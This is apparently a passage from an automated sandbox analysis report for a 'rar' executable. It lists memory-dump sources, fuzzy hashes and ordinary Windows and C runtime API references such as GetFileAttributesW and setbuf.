                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d81105a7b79cf5a8c0f7f899289e5f2ec23f4c2bbe66ca8a7c619892d1622942
                                                                                                                                                                                                                                                              • Instruction ID: 50c861f81de265e2642a9786f9c0eb11cdafa4ed5481aa9d198344bf4ed31223
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d81105a7b79cf5a8c0f7f899289e5f2ec23f4c2bbe66ca8a7c619892d1622942
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3118131909F8181EB40AB75E9403A9A2E4EF94BE0F144638EA9D877E6DE38D151C358
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                                                              • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                                              • Instruction ID: 4e796e6b0170dc8af2bd218f34032632593aaee73ddc5e595186ea37104a1a03
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0601A521E19E9282EBA88B37A900569A361EF54FF0F145630EE6D83BD8CF3CE5418705
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF6185D7A7B
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF618622AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF618627EF3
                                                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF6185D7A8F
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6185D7B44: GetStdHandle.KERNEL32(?,?,?,00007FF6185D7A9E), ref: 00007FF6185D7B4A
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6185D7B44: GetFileType.KERNELBASE(?,?,?,00007FF6185D7A9E), ref: 00007FF6185D7B56
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6185D7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6185D7A9E), ref: 00007FF6185D7B69
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF618622ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF618622AD0
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF618622B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF618622C1C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4044681568-0
                                                                                                                                                                                                                                                              • Opcode ID: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
                                                                                                                                                                                                                                                              • Instruction ID: ed17206fd356379bd4d188c9fdb0d9cee7e13773f57d9bb2151a8042a7119c95
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A010800E0D98206FB58B37554A23B9A6838F91B34F5082B8E91DCB7E7DD2C6406E39D
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                                                              • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                                              • Instruction ID: a9514470824a0ad0b2fc0e4b3634d647a559e7e7c470b4a08382c72a8f3084a7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD01A131A08F8282EBA4AB3AE8402786360EB40FB8F144331E53D855E9CF3CD986C744
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000800,00007FF6185E305D,?,?,?,?,?,?,?,?,00007FF6185F4126,?,?,?,?,00000800), ref: 00007FF6185E30F0
                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6185F4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6185E3119
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                              • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                                              • Instruction ID: 9e9987b8bbdb735ee4170d678c62ab4a81b2a8e0d3d0eeb7400cc1566a59a2f3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FF0A421B18A8142EBA0DB75F8543BD62A0FB8CBF4F400130E99CC3796CE6CD5845744
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1175261203-0
                                                                                                                                                                                                                                                              • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                                              • Instruction ID: 3229bfef368efe01438b3810ae78f091a80f9d782e795543540a243e0415aba6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58F06821B1898182F7709B30E8553F96264FF98B94F804031E9CDC6659DE2CD6449694
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                                                                                                                                              • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                                              • Instruction ID: ac8eae27e10009e5530b9a9fc9fe1ed425de066123d4cf8ff22bcde20e5e5a86
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74E02B20B3895143DBD88B29C491FA92390EF44F80F806035F80FC3A14DD1DC4488B44
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                                              • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                                              • Instruction ID: 00da18781a35b1aa700f8871e872e8ba606266f76d73cdb6782d80ca91543c91
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CE08660E19D4342FF08A7F2644517432A26F84F64F044070DD0DC6252EE2C688553CD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: cf3431c2f8b5c05d861a21d8e67f661f4fc02fcce2a835ad0cc1140c53210456
                                                                                                                                                                                                                                                              • Instruction ID: a45cd4e374da4e5826d3733db6859d59e99c91c136ede80da92014b523b1026d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf3431c2f8b5c05d861a21d8e67f661f4fc02fcce2a835ad0cc1140c53210456
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11E10121A08E8281FB658A3094547BE2791EF41FA8F044135DE4DCB7D6DF2EE445E79C
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: fe86b29481cf32e220eeea16457890f25d1a333407dcb7e8bf6cf3eea50450d3
                                                                                                                                                                                                                                                              • Instruction ID: 9e44ef34ee554a3918a18151488a528cd6ec4a0f788bdb8ce907ed24b7f01791
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe86b29481cf32e220eeea16457890f25d1a333407dcb7e8bf6cf3eea50450d3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4512473528BD195E7019F34A8441ED37A8FB44F98F58423AEF884BB9ADF389061C725
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                                                              • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                                              • Instruction ID: 471960e76e121ee75e96106c88057c57424c798eb699dfbb5e9faf0247770959
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21419D21A09E8382FB68DB35E85027973A2AF90FA0F505475D90DC77A1DE3CE845A3C9
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
